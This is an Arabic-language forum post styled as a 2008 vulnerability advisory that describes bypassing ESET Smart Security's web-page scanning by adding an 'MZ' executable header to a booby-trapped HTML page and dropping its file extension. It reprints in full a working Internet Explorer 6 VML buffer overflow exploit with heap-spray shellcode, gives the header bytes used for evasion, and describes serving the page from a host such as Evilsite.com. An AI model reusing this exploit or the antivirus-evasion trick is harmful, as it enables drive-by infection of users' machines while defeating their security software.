السلام عليكم ورحمة الله تعالى وبركاته.
نوع الثغرة: ESET Smart Security Malicious WebPage Detection Bypass
الإصدارات المصابة: جميع نسخ ESET Smart Security
المكتشف: DATA_SNIPER
تاريخ الإكتشاف: 2008/08/15
الخطورة: عالية جداا.
شرح التقنية المستخدمة:
تعتبر هذه الثغرة خطيرة جدا من ناحية انها قد تسمح بإدخال فيروسات وتنفيذ اكواد ضارة عن طريق ثغرات المتصفح حيث تكمن هذه الثغرة في التلاعب بصفحات HTML و التعديل عليها ،والثغرة التي إكتشفتها اساسها مبني على على فكرة "The Magic of magic byte" لكن مع بعض الإضافات لكي تكون سارية المفعول مع برامج AntiVirus الجديدة التي من بينها ESET Smart Security
The Magic of magic byte:
لقد ظهر هذا النوع من الثغرات بواسطة Andrey Bayora
و التي سميت بـ:
The Magic of magic byte
والتي تكون بإضافة هيدر الملفات التنفيذية الملفات التالية:
BAT,JS,HTML
حسب ما يقول صاحب الموقع.
مثلا هذا كود لإستثمار ثغرة في متصفح IE6:
# MS Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP2)
<!--
..::[ jamikazu presents ]::..
Microsoft Internet Explorer VML Remote Buffer Overflow Exploit (0day)
Works on all Windows XP versions including SP2
Author: jamikazu
Mail: jamikazu@*****.com
Credit: metasploit, SkyLined
invokes calc.exe if successful
-->
<html xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<body>
<script language="javascript">
var heapSprayToAddress = 0x05050505;
var payLoadCode =
unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
</script> <v:rect style='width:120pt;height:80pt' fillcolor="red">
<v:fill method = "ԅԅԅ" ></v:rect></v:fill>
</body>
</html>
وبإضافة الهيدر التالية إلى الملف لن يتم كشفه:
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$
ولقد ذكر مكتشف الثغرة بعض برامج Antivirus مصابة بها ولكن إصداراتها قديمة.
هذا رابط يشرح الثغرة:
http://www.securityelf.org/magicbyte.html
لكن هذه الثغرة تختلف قليلا + إضافة صغيرة وممكن تكون برامج عديدة مصابة بها.
ما الفرق بينهاما؟
ثغرة Magic Byte فعالة من ناحية انه الملفات المعدلة JS او BAT او HTML سيتم تشغيلها مباشرة "نقرتين على الزر الأيسر للفأرة
" لكن للأسف هذا كان سابقا.
النوع المعدل او المطور الذي اكتشفته في Eset Smart Security فعال في حالة واحدة عند رفع الصفحة الملغمة على سيرفر ويتم عرض الصفحة عن طريق المتصفح وبعد ذلك هي بدورها "ثغرات المتصفح" تشغل برمجيات واكواد ضارة ،وكم هي كثيرة اليوم خاصة ثغرات ActiveX + أن هذا النوع من الثغرات حديث ومتوافق مع IE6 فقط.
إن لم تفهم إقرأ الشرح.
شرح الثغرة:
بعد بعض التحليل توصلت إلى ان Eset Smart Security يقوم بعملية فحص الملفات وذلك عن طريق معرفة نوع الملف، مثلا إذا وجد البرنامج ان هذا المف ليس تنفيذي لمذا يقوم بإستعمال توقيعات الملفات التنفيذية"فيروسات-ديدان" والعكس إذا وجد ملف تنفيذي لماذا يقوم بفحصه بواسطة توقيعات الفيروسات و الثغرات من نوع HTML هنا يكمن اللغز
لكن السؤال كيف يتعرف الانتي فيروس على الملف؟
سهلة ..عن طريق البيتاتا السحرية او مقدمة الهيدر و الإمتدادات.
لذلك لن تنجح معك الطريقة إذا قمت بالتالي:.
1-إضافة هيدر ال EXE File لملف HTML وإبقاء إمتداد htm او html او js.
2-تغير إمتداد الصفحة الملغمة إلى EXE وعدم إضافة الهيدر او البايتات السحرية "MZ".
ارئيت إذن هنالك شطرطين في التعريف.
الإمتداد،البايتات السحرية.
مثلا صفحات HTML على سبيل المثال يتعرف عليها بالشكل التالي:
-الإمتداد html.
-البيتات السحرية الخاصة بال HTML Files هي "<*>" والتي تسمى HTML TAG "هذا مثال فقط وتحليل توفيقي فقط توصلت انا له وليس موثق".
الان وصلنا للجزء الأهم ماذا سنفعل لكي نتخطى الكشف.
سنقوم بإضافة البيتات السحري الخاصة بالملفات التنفيذية "MZ" او الهيدر التالي للصفحة الملغمة :
MZ@.....................@...................................@...PE..L....X.G....
.....................0..&........@....@
او:
MZ
لبداية الصفحة وحفضها ..افحصها الان، في رايك هل سيتم كشف الإستثمار او الصفحة الملغمة ...طبعا نعم لأن الشرط الأول غير محقق يجب تغير الإمتداد إلى txt او سنقوم بعدم وضع إمتداد ومادام IE6 يقرأ الصفحة دون إمتداد فالامر جيد ومفيد ، كان من الممكن ان تجعل إمتداده exe لكنك ستواجه مشاكل لذلك لا تضع له إمتداد وقم برفعه على سيرفر معين وتصفحه بالشكل التالي:
http://Evilsite.com/exploit
وسترى الكارثة ،الإكسبلويت تم تشغيلها والمستر ESET Stupid Security يشاهد.
وكملخص البرنامج لن يكشف اي فيروس او إستثمار ثغرة مكتوب بال HTML إذا كان به البيتات السحرية "MZ" و إمتداده غير إمتداد HTML او JS او VBS او PHP المهم اي شيء له العلاقة بالسكريبتات لأني اظن انها معا في نفس قاعدة البيانات.
الحلول:
لا تستعمل IE6 واستعمل Firefox او OPERA .
وللأنترنت أكسبلورل نصيب في هذه الثغرة أيضا فيما يتعلق بخدعة الإمتدادات.
سيتم إرفاق الفيدو المرة القادمة إن شاء الله و الذي يوضح خطورتها.
الثغرة لم يتم تجريبها على الانتي فيروس الاخرى عدى الكاسبر لكنه غير مصاب بها .
ارجو من الاخوة الذين تتوفر عندهم برامج مضادة اخرى ان يجربوها و يبلغوني
اذا كان الشرح معقد او فيه غموض فأنا اسف على التقصير.
والسلام عليكم ورحمة الله تعالى وبركاته.
------------------------
-_- In Memory Of JASS